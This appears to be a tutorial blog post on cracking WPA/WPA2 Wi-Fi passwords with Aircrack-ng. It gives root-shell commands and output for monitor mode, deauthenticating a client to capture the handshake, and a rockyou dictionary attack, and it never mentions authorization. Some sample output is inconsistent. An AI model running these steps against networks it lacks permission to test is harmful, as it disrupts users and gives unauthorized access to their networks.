Aircrack-ng
August 15, 2023 · 12 minute read
Overview
- 1. SSID (Service Set Identifier): The name of the Wi-Fi network that devices use to identify and connect to a network.
- 2. ESSID: An extended network configuration involving multiple access points that share the same SSID to cover a larger network area.
- 3. WEP: An older out of date encryption protocol for Wi-Fi that is now considered insecure.
- 4. WPA/WPA2/WPA3: Secure encryption protocols that provide stronger protection for Wi-Fi networks. The number differentiates on different generations of security protocols. Each generation builds upon the previous one addressing vulnerabilities and weaknesses.
- Aircrack-ng: This is the main tool of the suite and is used to capture packets from a wireless network, and then performing crytopgrahic attacks to recover WEP/WWPA/WPA2 keys.
- Airmon-ng: Manages wireless network interfaces, includes putting them into monitoring mode.
- Airodump-ng: Used for capturing packets from wireless networks.
- Aireplay-ng: Used for injecting traffic into wireless networks. This can be used for deauthentication attacks.
- Airbase-ng: Can be used to set up fake access points.
- Airtun-ng: Used to set up encrypted tunnels over a wireless network. Especially useful for securing communication or bypassing network restrictions.
- Airdecap-ng: Used for decrypting captured encrypted traffic.
Cracking Wi-Fi Passwords
- 1. Capturing Packets: The first step is to capture data packets from the target network. These packets contain information about network activity.
- 2. Collecting the Handshake: WPA and WPA2-PSK encrypted networks use a four-way handshake between a client device and a access point when a client wants to connect to the network. In order to collect these packets we can conduct a deauthorization attack to force devices to reconnect to the network; where we can then sniff the handshake.
- 3. Dictionary Attack: Once the handshake is captured, we can use a dictionary attack to attempt to crack the password. We compare the encrypted handshake data with the computed hashes of the dictionary entries.
- 4. Brute-Force Attack: If the dictionary attack fails, attackers can resort to a brute-force attack that tries every possible combination of characters until the correct password is found.
Practical Demonstration
#Check for processes that might interfere with the aircrack-ng suite and KILL them.
──(root㉿kali)-[/home/kali]
└─# sudo airmon-ng check kill
Killing these processes:
PID Name
763 wpa_supplicant
#Start monitor mode on target wireless interface
──(root㉿kali)-[/home/kali]
└─# sudo airmon-ng start [WIRELESS INTERFACE NAME]
PHY Interface Driver Chipset
phy0 wlan0 ath9k_htc Atheros Communications, Inc. AR9271 802.11n
#Ensure that target wireless interface is in moniter mode
──(root㉿kali)-[/home/kali]
└─# iwconfig
lo no wireless extensions.
eth0 no wireless extensions.
wlan0mon IEEE 802.11 Mode:Monitor Frequency:2.5 GHz Tx-Power=20 dBm
Retry short limit: 7 RTS thr:off Fragment thr:off
Power Management:off
sudo airodump-ng wlan0mon -d [BSSID OF TARGET NETWORK]
. Otherwise, if this is not specified, airodump-ng will grab data from all networks.
──(root㉿kali)-[/home/kali]
└─# sudo airodump-ng wlan0mon
CH 9 ][ Elapsed: 1 min ][ 2007-04-26 17:41 ][ WPA handshake: 00:14:6C:7E:40:80
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
7F:9E:2C:1D:A5:8B 25 16 10 0 0 11 51. WPA NETGEAR
BSSID STATION PWR Rate Lost Packets Notes Probes
9D:1E:F0:3B:7A:5C 00:0F:B5:32:31:31 61 16-54 2 18
#Use Airodump-ng to sniff handshake
──(root㉿kali)-[/home/kali]
└─# sudo airodump-ng -w results -c 11 -b 7F:9E:2C:1D:A5:8B wlan0mon
CH 9 ][ Elapsed: 1 min ][ 2007-04-26 17:41 ][ WPA handshake: 00:14:6C:7E:40:80
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
7F:9E:2C:1D:A5:8B 25 16 10 0 0 11 51. WPA NETGEAR
BSSID STATION PWR Rate Lost Packets Notes Probes
9D:1E:F0:3B:7A:5C 00:0F:B5:32:31:31 61 16-54 2 18
#Deauthorization attack
# -0 Means deauthentication
# 10 Means the number of deauthentication packets you want to send, 0 means continuously
# -a MAC Address of access point
# -c MAC Address of client to deauth, if this is blank, all clients are deauthenticationed
# wlan0mon interface name
──(root㉿kali)-[/home/kali]
└─# sudo aireplay-ng -0 10 -a 7F:9E:2C:1D:A5:8B -c 9D:1E:F0:3B:7A:5C wlan0mon
11:32:32 Sending DeAuth to station -- STMAC: [9D:1E:F0:3B:7A:5C]
11:32:32 Sending DeAuth to station -- STMAC: [9D:1E:F0:3B:7A:5C]
11:32:33 Sending DeAuth to station -- STMAC: [9D:1E:F0:3B:7A:5C]
11:32:35 Sending DeAuth to station -- STMAC: [9D:1E:F0:3B:7A:5C]
11:32:35 Sending DeAuth to station -- STMAC: [9D:1E:F0:3B:7A:5C]
#Hand shake is captured one you see WPA: Handshake field pop up
CH 9 ][ Elapsed: 1 min ][ 2007-04-26 17:41 ][ WPA handshake: 7F:9E:2C:1D:A5:8B
──(root㉿kali)-[/home/kali]
└─# sudo airmon-ng stop wlan0mon
#Begin dictionary attack with wordlist
──(root㉿kali)-[/home/kali]
└─# sudo aircrack-ng results.cap -w rockyou.txt
Aircrack-ng 1.4
[00:00:03] 561 keys tested (3126.25 k/s)
KEY FOUND! [ iloveyou ]
Master Key : CD D7 9A 5A CF B0 70 C7 E9 D1 02 3B 87 02 85 D6
39 E4 30 B3 2F 31 AA 37 AC 82 5A 55 35 55 24 EE
Transcient Key : 33 55 0B FC 4F 24 84 F4 9A 38 B3 D0 89 83 D2 49
63 F9 DE 89 67 A6 6D 2B 8E 46 2C 07 47 6A CE 08
AD FB 65 D6 13 A9 9F 2C 65 E4 A6 08 F2 5A 67 97
D9 6F 76 5B 8C D3 DF 13 2F BC AA 6A 6E D9 62 CD
EAPOL HMAC : 52 27 B8 3F 73 7C 45 A0 05 97 69 5C 30 78 60 BD